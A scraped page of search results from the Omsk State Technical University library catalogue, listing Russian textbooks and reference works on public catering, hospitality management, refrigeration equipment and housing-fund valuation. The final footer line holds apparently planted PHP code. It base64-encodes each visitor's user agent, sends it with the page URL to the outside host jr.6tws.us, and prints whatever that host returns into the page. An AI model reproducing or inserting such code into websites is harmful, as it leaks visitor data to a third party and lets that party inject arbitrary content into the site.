Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

242 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("UDC=338.48$")ИЛИ("UDC=796.5$")ИЛИ("UDC=64$")ИЛИ("UDC=332.87$")ИЛИ("UDC=658.64$")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 620
41. 
Предприятия общественного питания [Текст] : Правила и нормативы, 2000. - 273 с.
Держатели документа (Информация об экземплярах) 
42. 
Бабакин, Борис Сергеевич. Бытовые холодильники и морозильники [Текст] : Учеб. пособие для вузов по специальностям 230100 "Эксплуатация и обслуживание трансп. и технол. машин и оборудования (холодил. установки, оборудование и системы кондиционирования)", 070200 "Техника и физика низ. температур" / Б. С. Бабакин, В. А. Выгодин, 2000. - 656 с.
43. 
Справочник руководителя предприятия общественного питания [Текст] / Министерство торговли Российской Федерации, 2000. - 663 с.
44. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений начал. проф. образования / Под ред. Белоусовой С. Н., 2000. - 345 с.
45. 
Тепловое и механическое оборудование предприятий общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений нач. проф. образования / Н. Т. Улейский, Р. И. Улейская, 2000. - 478 с.
46. 
Технология обработки продуктов общественного питания [Текст] : Метод. указания для студентов днев. и вечер. форм обучения специальности 060800 "Экономика и упр. на предприятии (торговли и обществ. питания)" / В. В. Бирюкова, 2001. - 23 с.
Держатели документа (Информация об экземплярах) 
Полный текст
47. 
Нормы времени на работы по технической паспортизации основных фондов жилищно-коммунального хозяйства [Текст] : Утв. Минжилкомхоза РСФСР от 29.12.1989 по согласованию с Секретариатом ЦК профсоюза / Минжилкомхоз РСФСР, Центр. норматив.-исслед. станция, 1990. - 91, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
48. 
Сборник № 28 укрупненных показателей восстановительной стоимости жилых, общественных зданий и зданий и сооружений коммунально-бытового назначения для переоценки основных фондов [Текст] : Утв. Гос. ком. Совета Министров СССР по делам стр-ва / Гос. ком. Совета Министров СССР по делам стр-ва (Госстрой СССР), 1970. - 119, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
49. 
Курс лекций по регистрации основных фондов жилищно-коммунального хозяйства [Текст] : (10 лекций) / Респ. упр. техн. инвентаризации, 1990. - 32, [1] с.
Держатели документа (Информация об экземплярах) 
50. 
Ефимова, Ольга Петровна. Экономика общественного питания [Текст] : Учеб. пособие для вузов по экон. специальностям и направлениям / О. П. Ефимова; Н. И. Кабушкин, 2000. - 303 с.
Держатели документа (Информация об экземплярах) 
51. 
Кабушкин, Николай Иванович. Менеджмент гостиниц и ресторанов [Текст] : Учеб. пособие для вузов по экон. специальностям и направлениям / Н. И. Кабушкин, Г. А. Бондаренко, 2000. - 215 с.
Держатели документа (Информация об экземплярах) 
52. 
Справочник технолога общественного питания [Текст] / А. И. Мглинец, Г. Н. Ловачева, Л. М. Алешина, 2000. - 415 с.
53. 
Никуленкова, Тамара Трофимовна. Проектирование предприятий общественного питания [Текст] : Учеб. для вузов по специальности "Технология продуктов обществ. питания" / Т. Т. Никуленкова, Ю. И. Лавриненко, Г. М. Ястина, 2000. - 216 с.
54. 
Консервирование пищевых продуктов холодом [Текст] : (Теплофиз. основы): Учеб. пособие для вузов по специальностям "Технология консервов и пищеконцентратов", "Технология мяса и мясных продуктов", "Технология рыбы и рыбных продуктов", "Технология молока и молочных продуктов" / И. А. Рогов, В. Е. Куцакова, В. И. Филиппов, С. В. Фролов, 1999. - 174 с.
Держатели документа (Информация об экземплярах) 
55. 
Николаева Г. А. Бухгалтерский учет в общественном питании [Текст] : Учеб.-практ. пособие / Г. А. Николаева, Т. С. Сергеева, 1999. - 238 с.
Держатели документа (Информация об экземплярах) 
56. 
Общественное питание [Текст], 2000. - 272 с.
Держатели документа (Информация об экземплярах) 
57. 
Сергеева Т. С. Учет в общественном питании [Текст] : Документац. обеспечение / Т. С. Сергеева, 1999. - 288 с.
Держатели документа (Информация об экземплярах) 
58. 
Простакова, Татьяна Михайловна. Технология приготовления пищи [Текст] / Т. М. Простакова, 2000. - 351 с.
59. 
Золин, Виктор Петрович. Технологическое оборудование предприятий общественного питания [Текст] : Учеб. для учреждений нач. проф. образования, подгот. и переподгот. рабочих на пр-ве и в центрах занятости, проф. обучения учащихся сред. общеобразоват. шк. / В. П. Золин, 2000. - 249 с.
Держатели документа (Информация об экземплярах) 
60. 
Уокер, Джон. Введение в гостеприимство [Текст] : Учеб. / Р. Уокер; Н. Н. Михайлов, 1999. - 463 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2871 - 20.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.79 с.12 запросов, 0.58c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;